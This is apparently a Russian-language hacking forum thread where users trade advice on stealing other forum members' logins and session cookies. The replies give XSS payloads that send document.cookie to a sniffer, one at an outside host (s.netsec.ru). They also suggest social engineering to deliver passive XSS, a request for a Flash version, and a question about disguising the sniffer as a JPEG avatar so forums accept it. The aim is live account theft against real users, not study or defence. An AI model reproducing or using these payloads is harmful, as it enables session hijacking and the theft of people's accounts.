Привет всем, кто здесь присутствует. Прошу совет, что делать дельше... Я поставил сниффер с http://www.s.netsec.ru/ на один форум....кто-то нажал на мою фотку и у меня повились строки с IP адресом, ссылкой из какого топа пришли и время....а что надо дальше сделать, чтобы узнать логин и пароль этого счастливчика??? или cookie.... жду ответа, заранее благодарен. ____________________________
например если сниффер JPG, то <script>var img=new IMG(); img.src="sniffer/s.jpg"+document.cookie;</script> Или ченит типа этого ))
найди xss уязвимость если пассивная то можно с помощью СИ(фреймы,или прямую ссылку это зависит от твоего воображения и опыта в СИ) если активная,то там на порядок проще. Код который нужно вставлять тебе уже привели,другие примеры скрипта ворующего куки можно поглядеть на antichat.ru
Прошу прощения, напишите мне плиз скрипт, чтобы его можно было во Flash вставить... ну короче говоря...есть Flash сайт....мне надо сделать так, чтобы при кликанье ссылки на мой сниф приходили куки...вот и всё....в ссылку могу вписать Java Script, FS Command, Action Script ну или ссылку на страницу....прошу напишите для чего-нить из этого скрипт.... мой снифф http://s.netsec.ru/ZetRoX/pic.gif
обычно юзается скрипт <script>img=new Image(); img.src="http://s.netsec.ru/ZetRoX/pic.gif?;"+document.cookie;</script> у меня встречный вопрос: Как указать в скрипте размер картинки? (чтоб форум не противился принятию как аватар) требуется размер 100*100
он работает но чтоб он работал на всяких форумах/порталах надо каким то образом сделать чтоб аплоадеры распоновали как ЖэПэГэшку с размерами 100*100